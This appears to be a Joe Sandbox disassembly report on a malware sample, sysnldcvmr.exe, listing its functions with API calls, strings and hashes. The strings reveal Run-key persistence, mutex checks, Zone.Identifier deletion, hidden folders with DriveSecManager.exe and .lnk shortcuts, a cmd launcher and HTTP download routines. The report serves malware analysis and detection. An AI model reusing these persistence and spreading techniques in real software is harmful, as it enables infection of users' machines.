Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CreateInitializeInstancewsprintf
String ID: %comspec%$/c start %s & start %s\DriveSecManager.exe
API String ID: 2038452267-3640840557
Opcode ID: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
Instruction ID: 827debbb99fb5d40cfb779b5d8ae5ab415415813199b490bc36420c15ce2df05
Opcode Fuzzy Hash: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
Instruction Fuzzy Hash: 0C31D875A40208BFDB04DF98D884FDEB7B5EF88704F208199F619A73A4C674AE81CB54

Function 0040D410 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(009D0634), ref: 0040D429
CloseHandle.KERNEL32(009D0638), ref: 0040D458
LeaveCriticalSection.KERNEL32(009D0634), ref: 0040D467
DeleteCriticalSection.KERNEL32(009D0634), ref: 0040D474

Strings

.ou, xrefs: 0040D458

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CriticalSection$CloseDeleteEnterHandleLeave
String ID: .ou
API String ID: 3102160386-3683031111
Opcode ID: 07dc70c68ac7b0d2cc494817546f3db23909211f8ba204667fa5a7f367d8b6f4
Instruction ID: 6cfc4b79706d1bba1c4fbc1f32f5c608acb329628ab24e105d00911b1e03cc11
Opcode Fuzzy Hash: 07dc70c68ac7b0d2cc494817546f3db23909211f8ba204667fa5a7f367d8b6f4
Instruction Fuzzy Hash: AC112D74D00208EFDB08DF94D984A9EBB75FF48309F2081A9E806AB341D734EE95DB95

Function 00401330 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C

Part of subcall function 0040A1B0: RtlFreeHeap.NTDLL(009D0000,00000000,00402612,?,00402612,?), ref: 0040A20B

Strings

.ou, xrefs: 0040135C
pdu, xrefs: 00401339

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CloseEventFreeHandleHeapObjectSingleWait
String ID: pdu$.ou
API String ID: 309973729-2706015961
Opcode ID: 2fa896684b321fe836e516ce056a9b06d37fd724aa26af72c169520ae3e67de3
Instruction ID: 8798272c393d99dde58c69795aa0ec1d050c8eff8ee51a61ed5db2294712bea8
Opcode Fuzzy Hash: 2fa896684b321fe836e516ce056a9b06d37fd724aa26af72c169520ae3e67de3
Instruction Fuzzy Hash: 400186765003109BCB21AF55ECC4E9B7779AF48311B044679FD056B396C638E85487A5

Function 00401820 Relevance: 7.6, APIs: 5, Instructions: 116COMMON

Download Yara Rule

APIs

InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
InterlockedDecrement.KERNEL32(?), ref: 004018B1

Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
String ID:
API String ID: 3966618661-0
Opcode ID: 8ff310e7853ca029222ff4769d80b5f1c3030ef883704326f7d9456a7b5fb0ab
Instruction ID: 5b2b6301c056c53cf24b756eb28b55477e9028745ee4fe4862f5ad68d4db2f6a
Opcode Fuzzy Hash: 8ff310e7853ca029222ff4769d80b5f1c3030ef883704326f7d9456a7b5fb0ab
Instruction Fuzzy Hash: 1841B371604A02AFC714EB39D848797F7A4BF88310F14827EE82D933D1E735A855CB99

Function 00408A90 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

_allshl.NTDLL ref: 00408A9E
_allshl.NTDLL ref: 00408AAD
_allshl.NTDLL ref: 00408ABC
_allshl.NTDLL ref: 00408ACB
_allshl.NTDLL ref: 00408ADA

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: _allshl
String ID:
API String ID: 435966717-0
Opcode ID: 6ce938123fd61f227b6de6a29a17a105f2c46d2c2b520e971cfa59f1b0e97cc1
Instruction ID: 2f682f979519ea9f46037cdaf014f1fa89077d02b7b0d9f1a8f9fce332e03f2e
Opcode Fuzzy Hash: 6ce938123fd61f227b6de6a29a17a105f2c46d2c2b520e971cfa59f1b0e97cc1
Instruction Fuzzy Hash: 62F03672A11419D79720EFFFD4424CAF7E59F88354B118676F818E3270E5709D1146F5

Function 00407310 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(00000000,?,?), ref: 00407338
CreateThread.KERNEL32(00000000,00000000,00407370,00000000,00000000,00000000), ref: 0040735A
CloseHandle.KERNEL32(00000000), ref: 00407361

Strings

.ou, xrefs: 00407361

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CloseCreateHandleThreadmemcpy
String ID: .ou
API String ID: 2064604595-3683031111
Opcode ID: 4ba0acdde54fd6a1846075b770b5d55397f96483b8af1252066fbfcfee1e69d0
Instruction ID: f93afe995e2a8aed0921a04be4342d20ba97acab7f8849ac526c8a5d2aa2879c
Opcode Fuzzy Hash: 4ba0acdde54fd6a1846075b770b5d55397f96483b8af1252066fbfcfee1e69d0
Instruction Fuzzy Hash: 20F090B1A04308FBDB00DFA4EC46F9E7378BB48704F244468F908A73C1D675AA10CB59

Function 00401F50 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON

Download Yara Rule

APIs

GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
WSAGetLastError.WS2_32 ref: 00401FB9
GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
String ID:
API String ID: 2074799992-0
Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA

Function 00401C50 Relevance: 6.1, APIs: 4, Instructions: 59networksleepCOMMON

Download Yara Rule

APIs

WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
WSAGetLastError.WS2_32(?,?,?,00401FD3,00000000), ref: 00401C90
Sleep.KERNEL32(00000001,?,?,?,00401FD3,00000000), ref: 00401CA6
WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Recv$ErrorLastSleep
String ID:
API String ID: 3668019968-0
Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6

Function 00401AE0 Relevance: 6.0, APIs: 4, Instructions: 49networksleepCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
WSAGetLastError.WS2_32 ref: 00401B12
Sleep.KERNEL32(00000001), ref: 00401B28
WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Send$ErrorLastSleep
String ID:
API String ID: 2121970615-0
Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A

Function 004017A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CriticalSection$Leave$EnterExchangeInterlocked
String ID:
API String ID: 2223660684-0
Opcode ID: 37f68c2e8ae6063ea859c376eb200881b9ae20d6250016d66435a6145ab54c34
Instruction ID: 0184f799374b3cbd514a588550e5351e3808897b1395f0a2de410330185c2ead
Opcode Fuzzy Hash: 37f68c2e8ae6063ea859c376eb200881b9ae20d6250016d66435a6145ab54c34
Instruction Fuzzy Hash: DF01F7352423009FC3209F26EC44ADB77E8AF49711F04443EE80697650EB34E545DB28

Function 0040D980 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 0040DBC0: memset.NTDLL ref: 0040DBE8
Part of subcall function 0040DBC0: InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
Part of subcall function 0040DBC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
Part of subcall function 0040DBC0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
Part of subcall function 0040DBC0: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
Part of subcall function 0040DBC0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
Part of subcall function 0040DBC0: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
Part of subcall function 0040DBC0: InternetCloseHandle.WININET(00000000), ref: 0040DDB7

Part of subcall function 0040DAB0: SysAllocString.OLEAUT32(00000000), ref: 0040DADE
Part of subcall function 0040DAB0: CoCreateInstance.OLE32(00412408,00000000,00004401,004123F8,00000000), ref: 0040DB06
Part of subcall function 0040DAB0: SysFreeString.OLEAUT32(00000000), ref: 0040DBA1

SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
SysFreeString.OLEAUT32(00000000), ref: 0040DA65

Strings

%S%S, xrefs: 0040DA46

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
String ID: %S%S
API String ID: 1017111014-3267608656
Opcode ID: 90752405ea59c0d94f47ff5784e28f2eddf96679eb43bf22d5b787ed4233eba5
Instruction ID: beec9ad9f3848cf7af9d47610756df11a49d132dd1bd9a4578eda8885410465d
Opcode Fuzzy Hash: 90752405ea59c0d94f47ff5784e28f2eddf96679eb43bf22d5b787ed4233eba5
Instruction Fuzzy Hash: 4941E6B5E002099FCB04DBE4C885AEFB7B9BF48304F148569E505B7391D738AA85CFA5

Function 0040D250 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
CloseHandle.KERNEL32(?), ref: 0040D2A9

Strings

.ou, xrefs: 0040D2A9

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CloseHandleObjectSingleWait
String ID: .ou
API String ID: 528846559-3683031111
Opcode ID: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
Instruction ID: d1fe1851c25795fdacbee2e877de448503af208f5fff4c31293181607202da8f
Opcode Fuzzy Hash: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
Instruction Fuzzy Hash: 3B11C574A04208EFCB04CF84D580E69B7B6FB89354F2081AAEC05AB385C735EE52DB95

Function 00405EB0 Relevance: 5.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00415E30,?,00000000,?), ref: 00405EBF
memcpy.NTDLL(00000000,00000000,00000100), ref: 00405EFE
memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F73
LeaveCriticalSection.KERNEL32(00415E30), ref: 00405F90

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CriticalSectionmemcpy$EnterLeave
String ID:
API String ID: 469056452-0
Opcode ID: 8ca99ff4882e63aa9735e8727bb02e2b1fcb4473e0a054d1445a25974175a9b9
Instruction ID: 4abcbf5e8f17672ba879e37304839ab4c0f114d9c1813139277d8bca2654c775
Opcode Fuzzy Hash: 8ca99ff4882e63aa9735e8727bb02e2b1fcb4473e0a054d1445a25974175a9b9
Instruction Fuzzy Hash: 71217C35D04609EBCB04DF94D985BDEBBB1EB48304F1481AAE80567281D37CAA95CF9A

Analysis Process: sysnldcvmr.exePID: 8000, Parent PID: 2592COMMON

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1436
Total number of Limit Nodes:	1

Executed Functions

Function 00407590 Relevance: 114.1, APIs: 50, Strings: 15, Instructions: 351
sleepfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000BB8), ref: 0040759E
CreateMutexA.KERNELBASE(00000000,00000000,753f85d83d), ref: 004075AD
GetLastError.KERNEL32 ref: 004075B9
ExitProcess.KERNEL32 ref: 004075C8
GetModuleFileNameW.KERNEL32(00000000,00416268,00000105), ref: 00407602
PathFindFileNameW.SHLWAPI(00416268), ref: 0040760D
wsprintfW.USER32 ref: 0040762A
DeleteFileW.KERNEL32(?), ref: 0040763A
ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407651
wcscmp.NTDLL ref: 00407663
ExitProcess.KERNEL32 ref: 00407682

Strings

%windir%, xrefs: 00407694
%s\%s, xrefs: 00407790
Windows Settings, xrefs: 00407737, 0040781C, 00407918
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 004076F9
753f85d83d, xrefs: 004075A4
%temp%, xrefs: 00407875
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 004077DE
%userprofile%, xrefs: 0040764C
%s\%s, xrefs: 0040788C
%s:Zone.Identifier, xrefs: 0040761E
%s\tbtnds.dat, xrefs: 0040798E
%s\%s, xrefs: 004076AB
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 004078DA
%s\tbtcmds.dat, xrefs: 004079A8
sysnldcvmr.exe, xrefs: 00407657, 0040769F, 00407784, 00407880

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$753f85d83d$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Windows Settings$sysnldcvmr.exe
API String ID: 4172876685-2783337622
Opcode ID: a1d6fff7326ce72d0d35a9766f0f00425a4457401a86cf5fdb87ec0beecc7a9e
Instruction ID: e42dc10877dc27750cdf455f3f1a43eebb5fa16e92bd93e31d1e2fde4cabc692
Opcode Fuzzy Hash: a1d6fff7326ce72d0d35a9766f0f00425a4457401a86cf5fdb87ec0beecc7a9e
Instruction Fuzzy Hash: 50D1B6B1A80314BBE720ABA0DC4AFD93734AB48B05F1085B5F709B50D1DAF9A6C4CB5D

Non-executed Functions

Function 004066B0 Relevance: 79.1, APIs: 35, Strings: 10, Instructions: 305
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_chkstk.NTDLL(?,00406D30,?,?,?), ref: 004066B8
wsprintfW.USER32 ref: 004066EF
wsprintfW.USER32 ref: 0040670F
wsprintfW.USER32 ref: 0040672F
wsprintfW.USER32 ref: 0040674F
wsprintfW.USER32 ref: 00406768
PathFileExistsW.SHLWAPI(?), ref: 00406778
SetFileAttributesW.KERNEL32(?,00000080), ref: 004067B1
DeleteFileW.KERNEL32(?), ref: 004067BE
PathFileExistsW.SHLWAPI(?), ref: 004067CB
PathFileExistsW.SHLWAPI(?), ref: 004067E0
SetFileAttributesW.KERNEL32(?,00000080), ref: 004067F6
DeleteFileW.KERNEL32(?), ref: 00406803
PathFileExistsW.SHLWAPI(?), ref: 00406810
CreateDirectoryW.KERNEL32(?,00000000), ref: 00406823
SetFileAttributesW.KERNEL32(?,00000002), ref: 00406836
PathFileExistsW.SHLWAPI(?), ref: 00406843

Strings

%s\%s\%s, xrefs: 00406B3C
%s\%s, xrefs: 00406703
%s\%s, xrefs: 00406B15
%s.lnk, xrefs: 004066E3
shell32.dll, xrefs: 0040688F
%s\*, xrefs: 0040675C
%s\%s\DriveSecManager.exe, xrefs: 00406723
%s\%s, xrefs: 00406743
shell32.dll, xrefs: 004068A7
%s\%s, xrefs: 00406AA2

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: File$ExistsPathwsprintf$Attributes$Delete$CreateDirectory_chkstk
String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\DriveSecManager.exe$%s\*$shell32.dll$shell32.dll
API String ID: 2467965697-1256475382
Opcode ID: 6fdb608ebf9e3f7754ee061c031def056059c2a3e2aafc618c301169eaa81d58
Instruction ID: f76dd7f444767b2c43f85b167d980272eeebb95a9fd79305f50fc2a4155965b0
Opcode Fuzzy Hash: 6fdb608ebf9e3f7754ee061c031def056059c2a3e2aafc618c301169eaa81d58
Instruction Fuzzy Hash: BFD162B5900258ABCB20DF50DC44BEA77B8BB48304F0485EAF60AE6191D7B99BD4CF59

Function 00406570 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNEL32(ok@,00000000), ref: 0040657F
wsprintfW.USER32 ref: 00406595
FindFirstFileW.KERNEL32(?,?), ref: 004065AC
lstrcmpW.KERNEL32(?,00411108), ref: 004065D1
lstrcmpW.KERNEL32(?,0041110C), ref: 004065E7
wsprintfW.USER32 ref: 0040660A
wsprintfW.USER32 ref: 0040662A
MoveFileExW.KERNEL32(?,?,00000009), ref: 00406666
FindNextFileW.KERNEL32(000000FF,?), ref: 0040667A
FindClose.KERNEL32(000000FF), ref: 0040668F
RemoveDirectoryW.KERNEL32(?), ref: 00406699

Strings

%s\*, xrefs: 00406589
%s\%s, xrefs: 004065FE
ok@, xrefs: 0040657B, 0040661A, 0040657E, 0040661D
%s\%s, xrefs: 0040661E

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
String ID: %s\%s$%s\%s$%s\*$ok@
API String ID: 92872011-32713442
Opcode ID: bdcae0db678ffea431cb11009663f4446319228456e5c176b7e99ad091f418f3
Instruction ID: 6b6780eb73bc58f0ce40e07c43f053b4d902fc918dfc6bbc5558198ff1b4ac31
Opcode Fuzzy Hash: bdcae0db678ffea431cb11009663f4446319228456e5c176b7e99ad091f418f3
Instruction Fuzzy Hash: AB3127B5900218AFCB10DB60EC89FDA7778BB48701F4085A9F609A3195DB75DAD4CF58

Function 00402020 Relevance: 16.6, APIs: 11, Instructions: 131networkCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?), ref: 00402043
InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E

Part of subcall function 0040D130: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D14E

WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
setsockopt.WS2_32 ref: 004020D1
